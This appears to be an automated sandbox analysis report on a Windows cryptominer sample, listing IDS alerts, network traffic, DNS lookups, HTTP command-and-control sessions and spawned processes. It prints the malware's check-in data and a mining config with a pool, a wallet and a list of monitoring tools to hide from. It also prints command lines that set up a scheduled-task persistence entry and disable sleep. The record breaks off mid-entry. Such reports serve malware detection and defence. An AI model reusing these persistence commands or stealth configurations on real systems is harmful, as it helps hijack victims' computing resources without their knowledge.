                                      RT_VERSION0x4fe05c0x23cdataEnglishUnited States0.49125874125874125
                                      RT_MANIFEST0x4fe2d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.5469387755102041

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      03/18/24-17:51:14.723704TCP2051004ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request4972980192.168.2.12134.255.231.136
                                      03/18/24-17:51:14.723704TCP2011341ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection4972980192.168.2.12134.255.231.136
                                      03/18/24-17:52:16.406978TCP2051004ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request4973480192.168.2.12134.255.231.136
                                      03/18/24-17:52:16.406978TCP2011341ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection4973480192.168.2.12134.255.231.136
                                      03/18/24-17:50:15.279061TCP2051004ET TROJAN [ANY.RUN] SilentCryptoMiner Check-in POST Request4972680192.168.2.12134.255.231.136
                                      03/18/24-17:50:15.279061TCP2011341ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection4972680192.168.2.12134.255.231.136

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 18, 2024 17:48:14.718401909 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:48:14.888763905 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:48:14.888842106 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:48:14.889739990 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:48:15.059904099 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:48:15.082243919 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:48:15.128329992 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:48:17.191934109 CET4971080192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:48:17.361103058 CET8049710134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:48:17.361206055 CET4971080192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:48:17.530308962 CET8049710134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:48:19.581017971 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:48:19.683351994 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:48:49.887906075 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:48:50.034601927 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:49:07.940336943 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:49:08.046107054 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:49:14.928920031 CET4972380192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:49:15.100023031 CET8049723134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:49:15.100110054 CET4972380192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:49:15.267786026 CET8049723134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:49:17.649784088 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:49:17.847065926 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:49:32.876439095 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:49:33.050199032 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:49:41.456887007 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:49:41.550215006 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:50:12.813944101 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:50:13.034609079 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:50:15.110306978 CET4972680192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:50:15.278548002 CET8049726134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:50:15.278712988 CET4972680192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:50:15.279061079 CET4972680192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:50:15.494668007 CET8049726134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:50:15.494754076 CET4972680192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:50:15.669949055 CET8049726134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:50:15.669976950 CET8049726134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:50:15.670068026 CET4972680192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:50:15.686455011 CET4972680192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:50:15.854403973 CET8049726134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:50:32.923330069 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:50:33.034656048 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:50:55.706307888 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:50:55.847178936 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:51:05.829668045 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:51:06.034663916 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:51:14.555223942 CET4972980192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:51:14.723227978 CET8049729134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:51:14.723372936 CET4972980192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:51:14.723704100 CET4972980192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:51:14.932759047 CET8049729134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:51:14.932852030 CET4972980192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:51:15.107620001 CET8049729134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:51:15.107651949 CET8049729134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:51:15.107976913 CET4972980192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:51:15.108067989 CET4972980192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:51:15.229346037 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:51:15.276097059 CET8049729134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:51:15.318794012 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:15.442554951 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:51:15.511567116 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:15.511662960 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:15.511854887 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:15.655747890 CET1030049709162.19.224.121192.168.2.12
                                      Mar 18, 2024 17:51:15.655814886 CET4970910300192.168.2.12162.19.224.121
                                      Mar 18, 2024 17:51:15.704336882 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:15.899060011 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:15.940933943 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:25.575196981 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:25.644056082 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:35.588215113 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:35.641866922 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:44.671947956 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:44.847145081 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:51:56.332016945 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:51:56.534713030 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:52:05.856236935 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:52:06.050369024 CET4973010300192.168.2.1254.37.137.114
                                      Mar 18, 2024 17:52:16.050739050 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.218507051 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.218651056 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.406977892 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.620661020 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.620801926 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.795351982 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.795386076 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:16.795449018 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.795769930 CET4973480192.168.2.12134.255.231.136
                                      Mar 18, 2024 17:52:16.963506937 CET8049734134.255.231.136192.168.2.12
                                      Mar 18, 2024 17:52:22.677942038 CET103004973054.37.137.114192.168.2.12
                                      Mar 18, 2024 17:52:22.820596933 CET4973010300192.168.2.1254.37.137.114

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 18, 2024 17:48:14.622180939 CET6526453192.168.2.121.1.1.1
                                      Mar 18, 2024 17:48:14.712208033 CET53652641.1.1.1192.168.2.12
                                      Mar 18, 2024 17:48:17.066319942 CET5328353192.168.2.121.1.1.1
                                      Mar 18, 2024 17:48:17.164257050 CET53532831.1.1.1192.168.2.12

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 18, 2024 17:48:14.622180939 CET192.168.2.121.1.1.10x1033Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:17.066319942 CET192.168.2.121.1.1.10x505bStandard query (0)cf-protected-l7.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:14.712208033 CET1.1.1.1192.168.2.120x1033No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                      Mar 18, 2024 17:48:17.164257050 CET1.1.1.1192.168.2.120x505bNo error (0)cf-protected-l7.com134.255.231.136A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • cf-protected-l7.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.1249726134.255.231.136804112C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Mar 18, 2024 17:50:15.279061079 CET179OUTPOST /api/endpoint.php HTTP/1.1
                                      Accept: */*
                                      Connection: close
                                      Content-Length: 522
                                      Content-Type: application/json
                                      Host: cf-protected-l7.com
                                      User-Agent: cpp-httplib/0.12.6
                                      Mar 18, 2024 17:50:15.494754076 CET522OUTData Raw: 7b 22 69 64 22 3a 22 74 6d 73 6e 6e 70 72 70 62 76 6e 66 7a 6f 6b 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 36 38 33 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 62 75 73 22 2c 22 67 70 75 22 3a 22 42 46 32 44 46 22 2c
                                      Data Ascii: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.
                                      Mar 18, 2024 17:50:15.669949055 CET267INHTTP/1.1 200 OK
                                      Date: Tue, 19 Mar 2024 00:50:12 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                      X-Robots-Tag: noindex, nofollow
                                      X-Powered-By: PHP/8.0.30
                                      Content-Length: 17
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                      Data Ascii: {"response":"ok"}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.1249729134.255.231.136804112C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Mar 18, 2024 17:51:14.723704100 CET179OUTPOST /api/endpoint.php HTTP/1.1
                                      Accept: */*
                                      Connection: close
                                      Content-Length: 523
                                      Content-Type: application/json
                                      Host: cf-protected-l7.com
                                      User-Agent: cpp-httplib/0.12.6
                                      Mar 18, 2024 17:51:14.932852030 CET523OUTData Raw: 7b 22 69 64 22 3a 22 74 6d 73 6e 6e 70 72 70 62 76 6e 66 7a 6f 6b 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 36 38 33 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 62 75 73 22 2c 22 67 70 75 22 3a 22 42 46 32 44 46 22 2c
                                      Data Ascii: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.
                                      Mar 18, 2024 17:51:15.107620001 CET730INHTTP/1.1 200 OK
                                      Date: Tue, 19 Mar 2024 00:51:11 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                      X-Robots-Tag: noindex, nofollow
                                      X-Powered-By: PHP/8.0.30
                                      Content-Length: 479
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 30 30 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 39 70 58 41 35 43 55 35 48 38 6a 4e 62 34 78 36 41 44 4d 37 76 47 46 6b 34 65 38 7a 31 31 6a 42 39 41 6a 78 63 46 42 63 36 39 77 52 5a 58 66 50 6a 67 6e 6a 46 6b 46 7a 4c 54 6b 6d 35 77 33 33 46 4b 33 59 31 7a 59 76 4a 46 4a 63 65 64 45 4c 35 50 64 55 6e 5a 50 31 45 70 6d 78 68 78 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 6d 61 78 2d 63 70 75 22 3a 20 35 30 2c 0d 0a 20 20 20 20 22 69 64 6c 65 2d 77 61 69 74 22 3a 20 31 35 2c 0d 0a 20 20 20 20 22 69 64 6c 65 2d 63 70 75 22 3a 20 31 30 30 2c 0d 0a 20 20 20 20 22 73 74 65 61 6c 74 68 2d 74 61 72 67 65 74 73 22 3a 20 22 54 61 73 6b 6d 67 72 2e 65 78 65 2c 50 72 6f 63 65 73 73 48 61 63 6b 65 72 2e 65 78 65 2c 70 65 72 66 6d 6f 6e 2e 65 78 65 2c 70 72 6f 63 65 78 70 2e 65 78 65 2c 70 72 6f 63 65 78 70 36 34 2e 65 78 65 22 2c 0d 0a 20 20 20 20 22 6b 69 6c 6c 2d 74 61 72 67 65 74 73 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 73 74 65 61 6c 74 68 2d 66 75 6c 6c 73 63 72 65 65 6e 22 3a 20 74 72 75 65 0d 0a 7d
                                      Data Ascii: { "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10300, "wallet": "49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx", "password": "", "nicehash": false, "ssltls": false, "max-cpu": 50, "idle-wait": 15, "idle-cpu": 100, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe", "kill-targets": "", "stealth-fullscreen": true}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.1249734134.255.231.136804112C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Mar 18, 2024 17:52:16.406977892 CET179OUTPOST /api/endpoint.php HTTP/1.1
                                      Accept: */*
                                      Connection: close
                                      Content-Length: 523
                                      Content-Type: application/json
                                      Host: cf-protected-l7.com
                                      User-Agent: cpp-httplib/0.12.6
                                      Mar 18, 2024 17:52:16.620801926 CET523OUTData Raw: 7b 22 69 64 22 3a 22 74 6d 73 6e 6e 70 72 70 62 76 6e 66 7a 6f 6b 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 34 36 38 33 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 62 75 73 22 2c 22 67 70 75 22 3a 22 42 46 32 44 46 22 2c
                                      Data Ascii: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.
                                      Mar 18, 2024 17:52:16.795351982 CET730INHTTP/1.1 200 OK
                                      Date: Tue, 19 Mar 2024 00:52:13 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                      X-Robots-Tag: noindex, nofollow
                                      X-Powered-By: PHP/8.0.30
                                      Content-Length: 479
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 30 30 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 39 70 58 41 35 43 55 35 48 38 6a 4e 62 34 78 36 41 44 4d 37 76 47 46 6b 34 65 38 7a 31 31 6a 42 39 41 6a 78 63 46 42 63 36 39 77 52 5a 58 66 50 6a 67 6e 6a 46 6b 46 7a 4c 54 6b 6d 35 77 33 33 46 4b 33 59 31 7a 59 76 4a 46 4a 63 65 64 45 4c 35 50 64 55 6e 5a 50 31 45 70 6d 78 68 78 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 6d 61 78 2d 63 70 75 22 3a 20 35 30 2c 0d 0a 20 20 20 20 22 69 64 6c 65 2d 77 61 69 74 22 3a 20 31 35 2c 0d 0a 20 20 20 20 22 69 64 6c 65 2d 63 70 75 22 3a 20 31 30 30 2c 0d 0a 20 20 20 20 22 73 74 65 61 6c 74 68 2d 74 61 72 67 65 74 73 22 3a 20 22 54 61 73 6b 6d 67 72 2e 65 78 65 2c 50 72 6f 63 65 73 73 48 61 63 6b 65 72 2e 65 78 65 2c 70 65 72 66 6d 6f 6e 2e 65 78 65 2c 70 72 6f 63 65 78 70 2e 65 78 65 2c 70 72 6f 63 65 78 70 36 34 2e 65 78 65 22 2c 0d 0a 20 20 20 20 22 6b 69 6c 6c 2d 74 61 72 67 65 74 73 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 73 74 65 61 6c 74 68 2d 66 75 6c 6c 73 63 72 65 65 6e 22 3a 20 74 72 75 65 0d 0a 7d
                                      Data Ascii: { "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10300, "wallet": "49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx", "password": "", "nicehash": false, "ssltls": false, "max-cpu": 50, "idle-wait": 15, "idle-cpu": 100, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe", "kill-targets": "", "stealth-fullscreen": true}


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:17:48:11
                                      Start date:18/03/2024
                                      Path:C:\Users\user\Desktop\ft1i6jvAdD.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\ft1i6jvAdD.exe
                                      Imagebase:0x5e0000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff7bb310000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:17:48:12
                                      Start date:18/03/2024
